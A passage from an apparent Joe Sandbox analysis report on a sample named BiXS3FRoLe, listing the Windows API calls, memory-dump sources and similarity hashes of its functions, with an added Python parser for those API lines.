                                                                                                          • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343E6
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B3E949
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B3E99A
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B3EA5A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 2829624132-0
                                                                                                        • Opcode ID: 4e7ec7b73340ee7fea5c572b953ed9083e049734bcf1045a9ba265916080f09c
                                                                                                        • Instruction ID: ea92ddb26ccff5800cc96c66d5f321f13c9dbb6890165f5f9547bff2b819da91
                                                                                                        • Opcode Fuzzy Hash: 4e7ec7b73340ee7fea5c572b953ed9083e049734bcf1045a9ba265916080f09c
                                                                                                        • Instruction Fuzzy Hash: 9F616F719506079BEB299F24CC82BBAB7E8FF04300F2041FAE926D65C5E775E951CB50
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00AFCC7E,00000008,00000007,00000000,00000003,02200000,00000000,AE695AF0,?,00000000,?,00AFCC7E,?), ref: 00AFC8A3
                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 00AFC8EA
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AFC924
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 33631002-0
                                                                                                        • Opcode ID: 3930aa5bafa0ffb9a5e5c51cdb29305e7e245b7ba7d0fc6d25ed12d5eaea2239
                                                                                                        • Instruction ID: 6718212a6d2c221230a55ec463c51e1375241f96b4849ba47258158887288f1d
                                                                                                        • Opcode Fuzzy Hash: 3930aa5bafa0ffb9a5e5c51cdb29305e7e245b7ba7d0fc6d25ed12d5eaea2239
                                                                                                        • Instruction Fuzzy Hash: 7F210A7168030CBBEB208BA9DD86FAA7BE8EB01B61F100165FA55A72D0D7B45A04D751
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00B25050
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B2505A
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00B25067
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: 08493679651d336e1ad877a7df224b9a1d3374fce393f469f1b133e8872d0067
                                                                                                        • Instruction ID: a4f5aece9910ffd95235d53633cdec03d590e6a096ca27dfd40baec95ea4a10b
                                                                                                        • Opcode Fuzzy Hash: 08493679651d336e1ad877a7df224b9a1d3374fce393f469f1b133e8872d0067
                                                                                                        • Instruction Fuzzy Hash: 8B31C4749012289BCB21DF68DD88BDDBBF8AF08310F5045DAE41CA7250EB709F858F45
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00B20E4F,?,00B8C978,0000000C,00B20FA6,?,00000002,00000000), ref: 00B20E9A
                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00B20E4F,?,00B8C978,0000000C,00B20FA6,?,00000002,00000000), ref: 00B20EA1
                                                                                                        • ExitProcess.KERNEL32 ref: 00B20EB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1703294689-0
                                                                                                        • Opcode ID: d8f862aa9fb85d69f7b06ae0a41d536d9c8330370a109bf055b495eeb02037c1
                                                                                                        • Instruction ID: b0c73a23fac09fc1a568bcb26f9b2b14c99a121553550a8bb2e2f90addbd21d7
                                                                                                        • Opcode Fuzzy Hash: d8f862aa9fb85d69f7b06ae0a41d536d9c8330370a109bf055b495eeb02037c1
                                                                                                        • Instruction Fuzzy Hash: 81E04F31410608EFCF01BF24ED09A993BE9FB44B82F010494F84847222CF36DE81DB40
                                                                                                        APIs
                                                                                                        • ___crtGetLocaleInfoEx.LIBCPMT ref: 00AFC056
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale___crt
                                                                                                        • String ID: 2
                                                                                                        • API String ID: 3761071962-450215437
                                                                                                        • Opcode ID: 94d9ae317dddcc1a3e64a75f7081b7145ae45ece0e556ca61f5891539d9c8b25
                                                                                                        • Instruction ID: f654e91c753068194e537d976f6d76ed75a0a4fe83f3853cedd565b3b43ece83
                                                                                                        • Opcode Fuzzy Hash: 94d9ae317dddcc1a3e64a75f7081b7145ae45ece0e556ca61f5891539d9c8b25
                                                                                                        • Instruction Fuzzy Hash: AEE06569D5121CFAEB189BC59E86ABD727CDB013ADF108194F20156081D6F59F84D162
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6e1faccc783a5bce54931ea931349e9719e99bdc845055f3f1321b3b226d0423
                                                                                                        • Instruction ID: 728d7d669c5c94fb79a02c2f2ff17a108bce5ac62c84c202be63a0c9ce1198a7
                                                                                                        • Opcode Fuzzy Hash: 6e1faccc783a5bce54931ea931349e9719e99bdc845055f3f1321b3b226d0423
                                                                                                        • Instruction Fuzzy Hash: AA023D71E002299FDF14DFA9D8806AEB7F1FF48324F2581AAD919E7384D731AD458B81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 8431bf1585216168b14b9e69896166bb981aa5937ce0d909652faff991c4f99a
                                                                                                        • Instruction ID: f9ced110dd78ace9c40a68d9a6ab4eb0884a06a98b6056b719a87a5bc9080b75
                                                                                                        • Opcode Fuzzy Hash: 8431bf1585216168b14b9e69896166bb981aa5937ce0d909652faff991c4f99a
                                                                                                        • Instruction Fuzzy Hash: E6A27B74A10118EFCB18CF98D5A0ABDB7F1FB48310F25448EE596AB392CA35AE51DF50
                                                                                                        APIs
                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B31B6C,?,?,00000008,?,?,00B42C11,00000000), ref: 00B31D9E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: d0da7d5afee5f06a2559c5b1d4428be397b384a6b3d375dae112bd6d0c82d95e
• Instruction ID: 195f388c91989e3c498269810768c5e04fde916f8b8c64b16906d171d523aff6
• Opcode Fuzzy Hash: d0da7d5afee5f06a2559c5b1d4428be397b384a6b3d375dae112bd6d0c82d95e
• Instruction Fuzzy Hash: DEB13B31610608DFD715CF2CC48AB657BE4FF45364F258A98E89ACF2A1C736E991CB40

Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1378c1ea8ac008bea2a82f3f13e83508fd07694324477d16890ddb1fbed57b1c
• Instruction ID: b948669db5817b41510fa3525dc3901c3c3a88568da8d0c435258c2ea8fc81fc
• Opcode Fuzzy Hash: 1378c1ea8ac008bea2a82f3f13e83508fd07694324477d16890ddb1fbed57b1c
• Instruction Fuzzy Hash: 6051A572A046598BCB18EF68DE95BAAB7F5FB64300F058659E4059B391EF31A901CB80

APIs
• GetLogicalDriveStringsA.KERNEL32(00000104,00000000), ref: 00A8D9EC
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: DriveLogicalStrings
• String ID:
• API String ID: 2022863570-0
• Opcode ID: 00095bd6e2861f05f66b1a78497eea1cef6a9095a0deae9482169715c3f0477d
• Instruction ID: 784a2db5f38f191690f796c7bd42fedd7f052f3a25dc7a51ca7dd0bd108bd533
• Opcode Fuzzy Hash: 00095bd6e2861f05f66b1a78497eea1cef6a9095a0deae9482169715c3f0477d
• Instruction Fuzzy Hash: 53410270D0424A9FDB14EFA4C885BAEFBF1EF45300F244259E405A73C1D7B9AA44CB91

APIs
  • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
  • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
  • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
  • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
• EnumSystemLocalesW.KERNEL32(00B3E8F5,00000001,00000000,?,00B30C69,?,00B3EF22,00000000,?,?,?), ref: 00B3E83F
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 7e366af156148b98e4b8a727fc2a3e3bfe5bedb383221a2c05d0571a67060384
• Instruction ID: f0b43e7133bb6832352a81a0041c5a26f24d8084d6b18555321b9e52a1adda16
• Opcode Fuzzy Hash: 7e366af156148b98e4b8a727fc2a3e3bfe5bedb383221a2c05d0571a67060384
• Instruction Fuzzy Hash: 7111063AA007019FDB189F3988956BABBD1FB80358F24446DE59647B80D771B942C740

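Every function entry in this listing uses the same record layout: an optional APIs list (the function's direct calls, plus calls the sandbox propagates from a shared subcall such as 00B3437A), a Memory Dump Source block, and a Similarity block. The Python parser below is an added example and is not part of the Joe Sandbox report or its tooling. It turns the APIs lines into records, keeps direct calls apart from subcall-propagated ones so a shared helper is not counted once per caller, and decodes the hexadecimal arguments. The sample input is constructed from lines of this listing; the only assumption about the report is the line layout seen above.

```python
import re
from collections import defaultdict

# Constructed sample: "APIs" entries in the layout used by the function listing
# (addresses and arguments copied from that listing; the layout is the only
# assumption this parser makes about the report).
SAMPLE = """\
APIs
• GetLogicalDriveStringsA.KERNEL32(00000104,00000000), ref: 00A8D9EC
APIs
  • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
  • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
  • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
  • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
• EnumSystemLocalesW.KERNEL32(00B3E8F5,00000001,00000000,?,00B30C69,?,00B3EF22,00000000,?,?,?), ref: 00B3E83F
APIs
• CryptReleaseContext.ADVAPI32(?,00000000), ref: 00AD4733
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00091AD6,00B00DA2), ref: 00B01ACF
"""

# One API line: optional subcall prefix, Name.MODULE, optional (args), ref: address.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",? ref: (?P<ref>[0-9A-F]{8})\s*$"
)
HEX = re.compile(r"^[0-9A-F]+$")


def parse_api_blocks(text):
    """Split the listing at each 'APIs' header and collect the calls under it.

    Direct calls and calls reported as 'Part of subcall function X' are kept
    apart: the subcall lines describe a shared helper and repeat under every
    caller, so counting them as the caller's own imports inflates the picture.
    """
    blocks = []
    current = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"direct": [], "subcalls": defaultdict(list)}
            blocks.append(current)
            continue
        m = API_LINE.match(line)
        if current is None or not m:
            continue  # Memory Dump Source / Similarity lines are skipped
        call = {
            "api": m["api"],
            "module": m["module"],
            "ref": m["ref"],
            "args": [] if m["args"] is None else m["args"].split(","),
        }
        if m["sub"]:
            current["subcalls"][m["sub"]].append(call)
        else:
            current["direct"].append(call)
    return blocks


def decode_args(call):
    """Hex tokens become ints, '?' (unresolved by the sandbox) becomes None,
    anything else (e.g. 'Function_00091AD6') is kept as the raw token."""
    out = []
    for tok in call["args"]:
        if tok == "?":
            out.append(None)
        elif HEX.match(tok):
            out.append(int(tok, 16))
        else:
            out.append(tok)
    return out


def direct_imports(blocks):
    """Module -> sorted API names, counting direct calls only."""
    by_module = defaultdict(set)
    for block in blocks:
        for call in block["direct"]:
            by_module[call["module"]].add(call["api"])
    return {mod: sorted(names) for mod, names in by_module.items()}


if __name__ == "__main__":
    blocks = parse_api_blocks(SAMPLE)
    for mod, names in sorted(direct_imports(blocks).items()):
        print(f"{mod}: {', '.join(names)}")
    # The GetLogicalDriveStringsA call passes nBufferLength 0x104 (260, MAX_PATH).
    print(decode_args(blocks[0]["direct"][0]))
```

Keeping subcall-propagated calls separate also explains why several distinct functions in this listing share the API ID ErrorLast$EnumLocalesSystem_abort_free and API String ID 1084509184-0: each of them calls EnumSystemLocalesW directly and inherits GetLastError, _free, SetLastError and _abort from the same helper at 00B3437A, so the API set, and therefore the similarity key, is identical.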
APIs
  • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
  • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
  • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
  • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
• EnumSystemLocalesW.KERNEL32(00B3EB45,00000001,?,?,00B30C69,?,00B3EEE6,00B30C69,?,?,?,?,?,00B30C69,?,?), ref: 00B3E8B4
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: f71658822bde725706e8a3fea5419f9fa2599fb07af1cf629f0ff78651a28fe1
• Instruction ID: 73c83f1ea11bc3d5fd91fca7dd223929b7566b3b12eddac1a56475008c5afecf
• Opcode Fuzzy Hash: f71658822bde725706e8a3fea5419f9fa2599fb07af1cf629f0ff78651a28fe1
• Instruction Fuzzy Hash: 64F022367007041FDB149F39D881A6ABBD0EF81368F2444BEF9028B6D0DBB1EC42CA00

APIs
  • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
  • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
  • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
  • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
• EnumSystemLocalesW.KERNEL32(00B3E6D9,00000001,?,?,?,00B3EF44,00B30C69,?,?,?,?,?,00B30C69,?,?,?), ref: 00B3E7B9
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 016790ecc42f982c8d85aadc858e309dc807d97a26e042a8abbdf4f4637dd9be
• Instruction ID: 60c6c5bb0094db77828ebce2e1dc3383eaacf0fa3c4c2c7d327a8ee5c0430b6a
• Opcode Fuzzy Hash: 016790ecc42f982c8d85aadc858e309dc807d97a26e042a8abbdf4f4637dd9be
• Instruction Fuzzy Hash: 6DF0E53A30020597DB04AF76D85576A7FD4EFC1B64F1640AAFA158B390C771ED42D750

APIs
• CryptReleaseContext.ADVAPI32(?,00000000), ref: 00AD4733
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: ContextCryptRelease
• String ID:
• API String ID: 829835001-0
• Opcode ID: c8cb9d7f161ff7a51e304db47228a3b08a3e2062b99e481343c864fa21021a37
• Instruction ID: 9cb0141594849b82c1e8c4af6383b316f93e134069ac912aa30d0853be84ae38
• Opcode Fuzzy Hash: c8cb9d7f161ff7a51e304db47228a3b08a3e2062b99e481343c864fa21021a37
• Instruction Fuzzy Hash: 7BD05E7176432113D2316B189C49B4ABED85F16B42F08889AB989E73C0DBF1D84487A8

APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00091AD6,00B00DA2), ref: 00B01ACF
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
